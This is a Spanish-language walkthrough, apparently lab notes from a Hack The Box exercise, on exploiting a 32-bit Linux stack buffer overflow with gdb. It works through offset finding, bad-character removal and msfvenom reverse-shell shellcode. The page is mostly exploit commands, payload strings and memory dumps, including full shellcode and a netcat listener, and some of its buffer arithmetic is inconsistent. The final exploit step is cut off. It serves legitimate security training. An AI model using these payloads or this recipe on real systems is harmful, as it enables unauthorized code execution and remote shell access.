Page cover

💿Buffer Overflow en Linux

Es una vulnerabilidad de seguridad en la que un programa, al escribir datos en un buffer de memoria, sobrepasa los límites del buffer y sobreescribe la memoria, pudiendo, por ejemplo, ejecutar código.

Nota: Este tipo de técnicas son muy invasivas, ya que vamos a sobreescribir la memoria de un buffer y ejecutar una reverse shell, por lo que no podemos utilizar estas técnicas sin un consentimiento o aprobación por parte del objetivo

Buffer Overflow en Linux

Nos conectamos por SSH al host

gdb -q leave_msg # O programa que contenga el host
run $(python -c "print '\x55' * 1200")

1. Subir el 1200 hasta que de un error

(gdb) info registers 

eax            0x1	1
ecx            0xffffd6c0	-10560
edx            0xffffd06f	-12177
ebx            0x55555555	1431655765
esp            0xffffcfd0	0xffffcfd0
ebp            0x55555555	0x55555555	# <---- EBP overwritten
esi            0xf7fb5000	-134524928
edi            0x0	0
eip            0x55555555	0x55555555	# <---- EIP overwritten
eflags         0x10286	[ PF SF IF RF ]
cs             0x23	35
ss             0x2b	43
ds             0x2b	43
es             0x2b	43
fs             0x0	0
gs             0x63	99

2. Saber el número exacto en el que da el fallo

  • Aproximarnos lo máximo que podamos

  • En el número 2100 falla lo más cercano

  • Usamos Metasploit Tools para generar un pattern

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2100
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7-----SNIP-----0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9

Lo ejecutamos con python en GDB:

(gdb) run $(python -c "print 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9'")
info registers
EIP: 0x37714336

  • Vemos el offset con Metasploit Tools:

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x37714336 [*] Exact match at offset 2060

Encontramos el offset en 2060

(gdb) run $(python -c "print '\x55' * 2060 + '\x66' * 4")
(gdb) info proc all

0xfffdc000 0xffffe000    0x22000        0x0 [stack]

3. Determinar la longitud del shellcode

msfvenom -p linux/x86/shell_reverse_tcp LHOST=127.0.0.1 lport=31337 --platform linux --arch x86 --format c

Payload size: 68 bytes
Final size of c file: 311 bytes
Longitud del Shellcode
   Buffer = "\x55" * (2064 - 100 - 150 - 4) = 1810
     NOPs = "\x90" * 100
Shellcode = "\x44" * 150
      EIP = "\x66" * 4
(gdb) run $(python -c 'print "\x55" * (2064 - 100 - 150 - 4) + "\x90" * 100 + "\x44" * 150 + "\x66" * 4')

(gdb) info registers 0x66666666 #Es correcto

4. Identificar Bad Characters:

htb-student@nixbof32skills:~$ CHARS="\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"

echo $CHARS | sed 's/\x/ /g' | wc -w
256

  • Calcular buffer de nuevo:

Buffer = "\x55" * (2064 - 256 - 4) = 1804
 CHARS = "\x00\x01\x02\x03\x04\x05...<SNIP>...\xfd\xfe\xff"
   EIP = "\x66" * 4
(gdb) run $(python -c 'print("\x55" * (2064 - 256 - 4) + "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" + "\x66" * 4)')
(gdb) disas main

Dump of assembler code for function main:
   0x56555582 <+0>: 	lea    ecx,[esp+0x4]
   0x56555586 <+4>: 	and    esp,0xfffffff0
   0x56555589 <+7>: 	push   DWORD PTR [ecx-0x4]
   0x5655558c <+10>:	push   ebp
   0x5655558d <+11>:	mov    ebp,esp
   0x5655558f <+13>:	push   ebx
   0x56555590 <+14>:	push   ecx
   0x56555591 <+15>:	call   0x56555450 <__x86.get_pc_thunk.bx>
   0x56555596 <+20>:	add    ebx,0x1a3e
   0x5655559c <+26>:	mov    eax,ecx
   0x5655559e <+28>:	mov    eax,DWORD PTR [eax+0x4]
   0x565555a1 <+31>:	add    eax,0x4
   0x565555a4 <+34>:	mov    eax,DWORD PTR [eax]
   0x565555a6 <+36>:	sub    esp,0xc
   0x565555a9 <+39>:	push   eax
   0x56555778 <+61>:	call   0x5655568d <leavemsg>	# <---- leavemsg Function
   0x565555af <+45>:	add    esp,0x10
   0x565555b2 <+48>:	sub    esp,0xc
   0x565555b5 <+51>:	lea    eax,[ebx-0x1974]
   0x565555bb <+57>:	push   eax
   0x565555bc <+58>:	call   0x565553e0 <puts@plt>
   0x565555c1 <+63>:	add    esp,0x10
   0x565555c4 <+66>:	mov    eax,0x1
   0x565555c9 <+71>:	lea    esp,[ebp-0x8]
   0x565555cc <+74>:	pop    ecx
   0x565555cd <+75>:	pop    ebx
   0x565555ce <+76>:	pop    ebp
   0x565555cf <+77>:	lea    esp,[ecx-0x4]
   0x565555d2 <+80>:	ret    
End of assembler dump.

5. GDB Breakpoint:

break leavemsg

(gdb) run $(python -c 'print("\x55" * (2064 - 256 - 4) + "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" + "\x66" * 4)')

Breakpoint 1, 0x56555691 in leavemsg ()

  • Hemos alcanzado el breakpoint.

6. Ver el Stack:

(gdb) x/2000xb $esp+500

0xffffd28a:	0xbb	0x69	0x36	0x38	0x36	0x00	0x00	0x00
0xffffd292:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xffffd29a:	0x00	0x2f	0x68	0x6f	0x6d	0x65	0x2f	0x73
0xffffd2a2:	0x74	0x75	0x64	0x65	0x6e	0x74	0x2f	0x62
0xffffd2aa:	0x6f	0x77	0x2f	0x62	0x6f	0x77	0x33	0x32
0xffffd2b2:	0x00    0x55	0x55	0x55	0x55	0x55	0x55	0x55
                      # |---> "\x55" empieza

0xffffd2ba: 0x55	0x55	0x55	0x55	0x55	0x55	0x55	0x55
0xffffd2c2: 0x55	0x55	0x55	0x55	0x55	0x55	0x55	0x55
<SNIP>

  • Vemos que se sobreescribe el buffer donde terminan los 0x55

  • Empieza por 0x01 en vez de 0x00, nos mostró un error de null byte ignored

/bin/bash: warning: command substitution: ignored null byte in input

  • Eliminamos el 0x00 de la ecuación, por lo que será 1 byte menos:

"\x00" eliminado: 256 - 1 = 255 bytes

  • Ajustamos el buffer de nuevo sin el x00:

Buffer = "\x55" * (2064 - 255 - 4) = 1803
 CHARS = "\x01\x02\x03\x04\x05...<SNIP>...\xfd\xfe\xff"
   EIP = "\x66" * 4
(gdb) run $(python -c 'print("\x55" * (2064 - 255 - 4) + "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" + "\x66" * 4)')
Stack
(gdb) x/2000xb $esp+550

<SNIP>
0xffffd5ba:	0x55	0x55	0x55	0x55	0x55	0x01	0x02	0x03
0xffffd5c2:	0x04	0x05	0x06	0x07	0x08	0x00	0x0b	0x0c
                                                     # |----| <- "\x09" expected

0xffffd5ca:	0x0d	0x0e	0x0f	0x10	0x11	0x12	0x13	0x14
<SNIP>

  • Eliminamos también de la ecuación el 0x09 y lo volvemos a enviar:

Notas
Buffer = "\x55" * (2064 - 254 - 4) = 782	

# "\x00" & "\x09" eliminados: 256 - 2 = 254 bytes
 CHARS = "\x01\x02\x03\x04\x05\x06\x07\x08\x0a\x0b...<SNIP>...\xfd\xfe\xff" 
 
   EIP = "\x66" * 4
(gdb) run $(python -c 'print("\x55" * (2064 - 254 - 4) + "\x01\x02\x03\x04\x05\x06\x07\x08\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" + "\x66" * 4)')
(gdb) x/2000xb $esp+550

<SNIP>
0xffffd5ba:	0x55	0x55	0x55	0x55	0x55	0x01	0x02	0x03
0xffffd5c2:	0x04	0x05	0x06	0x07	0x08	0x00	0x0b	0x0c
                                                     # |----| <- "\x0a" expected

0xffffd5ca:	0x0d	0x0e	0x0f	0x10	0x11	0x12	0x13	0x14
<SNIP>

  • Repetir este proceso hasta que no aparezca ningún null byte 0x00

Código final sin ningún null byte:

(gdb) run $(python -c 'print("\x55" * (2064 - 252 - 4) + "\x01\x02\x03\x04\x05\x06\x07\x08\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" + "\x66" * 4)')
Sin ningún null byte
0xffffd690:	0x55	0x55	0x55	0x55	0x55	0x55	0x55	0x55
0xffffd698:	0x55	0x55	0x55	0x55	0x55	0x55	0x01	0x02
                                     # Empiezan los caracteres |----| 
                                     
0xffffd6a0:	0x03	0x04	0x05	0x06	0x07	0x08	0x0b	0x0c
0xffffd6a8:	0x0d	0x0e	0x0f	0x10	0x11	0x12	0x13	0x14
0xffffd6b0:	0x15	0x16	0x17	0x18	0x19	0x1a	0x1b	0x1c
0xffffd6b8:	0x1d	0x1e	0x1f	0x21	0x22	0x23	0x24	0x25
0xffffd6c0:	0x26	0x27	0x28	0x29	0x2a	0x2b	0x2c	0x2d
0xffffd6c8:	0x2e	0x2f	0x30	0x31	0x32	0x33	0x34	0x35
0xffffd6d0:	0x36	0x37	0x38	0x39	0x3a	0x3b	0x3c	0x3d
0xffffd6d8:	0x3e	0x3f	0x40	0x41	0x42	0x43	0x44	0x45
0xffffd6e0:	0x46	0x47	0x48	0x49	0x4a	0x4b	0x4c	0x4d
0xffffd6e8:	0x4e	0x4f	0x50	0x51	0x52	0x53	0x54	0x55
0xffffd6f0:	0x56	0x57	0x58	0x59	0x5a	0x5b	0x5c	0x5d
0xffffd6f8:	0x5e	0x5f	0x60	0x61	0x62	0x63	0x64	0x65
0xffffd700:	0x66	0x67	0x68	0x69	0x6a	0x6b	0x6c	0x6d
0xffffd708:	0x6e	0x6f	0x70	0x71	0x72	0x73	0x74	0x75
0xffffd710:	0x76	0x77	0x78	0x79	0x7a	0x7b	0x7c	0x7d
0xffffd718:	0x7e	0x7f	0x80	0x81	0x82	0x83	0x84	0x85
0xffffd720:	0x86	0x87	0x88	0x89	0x8a	0x8b	0x8c	0x8d

Los Bad Characters detectados son: 

\x00\x09\x0a\x20 # Son necesarios para generar el shellcode

7. Generando el shellcode:

msfvenom -p linux/x86/shell_reverse_tcp lhost=127.0.0.1 lport=31337 --format c --arch x86 --platform linux --bad-chars "\x00\x09\x0a\x20" --out shellcode

cat shellcode

unsigned char buf[] = "\xdb\xc5\xd9\x74\x24\xf4\xbf\xb5\x28\xa8\x8f\x5d\x29\xc9" "\xb1\x12\x31\x7d\x17\x83\xc5\x04\x03\xc8\x3b\x4a\x7a\x03" "\xe7\x7d\x66\x30\x54\xd1\x03\xb4\xd3\x34\x63\xde\x2e\x36" "\x17\x47\x01\x08\xd5\xf7\x28\x0e\x1c\x9f\xd5\xf0\xde\x5e" "\x42\xf3\xde\x1a\xfb\x7a\x3f\x6a\x9d\x2c\x91\xd9\xd1\xce" "\x98\x3c\xd8\x51\xc8\xd6\x8d\x7e\x9e\x4e\x3a\xae\x4f\xec" "\xd3\x39\x6c\xa2\x70\xb3\x92\xf2\x7c\x0e\xd4";

Payload size: 95 bytes 
Final size of c file: 425 bytes

  • Editarlo en oneliner siguiendo el siguiente esquema:

   Buffer = "\x55" * (2064 - 100 - 95 - 4) = 1873
     NOPs = "\x90" * 100
Shellcode = "\xda\xca\xba\xe4\x11...<SNIP>...\x5a\x22\xa2"
      EIP = "\x66" * 4'
(gdb) run $(python -c 'print("\x55" * (2064 - 100 - 95 - 4) + "\x90" * 100 + "\xdb\xc5\xd9\x74\x24\xf4\xbf\xb5\x28\xa8\x8f\x5d\x29\xc9\xb1\x12\x31\x7d\x17\x83\xc5\x04\x03\xc8\x3b\x4a\x7a\x03\xe7\x7d\x66\x30\x54\xd1\x03\xb4\xd3\x34\x63\xde\x2e\x36\x17\x47\x01\x08\xd5\xf7\x28\x0e\x1c\x9f\xd5\xf0\xde\x5e\x42\xf3\xde\x1a\xfb\x7a\x3f\x6a\x9d\x2c\x91\xd9\xd1\xce\x98\x3c\xd8\x51\xc8\xd6\x8d\x7e\x9e\x4e\x3a\xae\x4f\xec\xd3\x39\x6c\xa2\x70\xb3\x92\xf2\x7c\x0e\xd4" + "\x66" * 4)')
x/2000xb $esp+500 # Vemos el buffer

8. Dirección de memoria donde queremos escribir nuestro payload:

Donde empiezan los 0x90:

0xffffd6bc:	0x55	0x55	0x55	0x55	0x55	0x55	0x55	0x55
0xffffd6c4:	0x55	0x55	0x55	0x55	0x55	0x55	0x55	0x55
0xffffd6cc:	0x55	0x55	0x55	0x55	0x55	0x55	0x55	0x55
0xffffd6d4:	0x55	0x55	0x55	0x55	0x55	0x55	0x55	0x90
# ---- Empezamos a inyectar aquí nuestro shellcode ----
0xffffd6dc:	0x90	0x90	0x90	0x90	0x90	0x90	0x90	0x90
0xffffd6e4:	0x90	0x90	0x90	0x90	0x90	0x90	0x90	0x90
0xffffd6ec:	0x90	0x90	0x90	0x90	0x90	0x90	0x90	0x90
0xffffd6f4:	0x90	0x90	0x90	0x90	0x90	0x90	0x90	0x90
0xffffd6fc:	0x90	0x90	0x90	0x90	0x90	0x90	0x90	0x90
0xffffd6dc -> \xdc\xd6\xff\xff # Empieza a contar de 2 en 2 desde la derecha

Editamos el buffer de nuevo para agregar esta dirección en el EIP:

Notas
   Buffer = "\x55" * (2064 - 100 - 95 - 4) = 1865
     NOPs = "\x90" * 100
Shellcode = "\xdb\xc5\xd9\x74\x24\xf4\xbf\xb5\x28\xa8\x8f\x5d\x29\xc9\xb1\x12\x31\x7d\x17\x83\xc5\x04\x03\xc8\x3b\x4a\x7a\x03\xe7\x7d\x66\x30\x54\xd1\x03\xb4\xd3\x34\x63\xde\x2e\x36\x17\x47\x01\x08\xd5\xf7\x28\x0e\x1c\x9f\xd5\xf0\xde\x5e\x42\xf3\xde\x1a\xfb\x7a\x3f\x6a\x9d\x2c\x91\xd9\xd1\xce\x98\x3c\xd8\x51\xc8\xd6\x8d\x7e\x9e\x4e\x3a\xae\x4f\xec\xd3\x39\x6c\xa2\x70\xb3\x92\xf2\x7c\x0e\xd4"
      EIP = "\xdc\xd6\xff\xff"

9. Exploit final:

En una pestaña
htb-student@nixbof32skills: nc -nlvp 31337
En otra pestaña
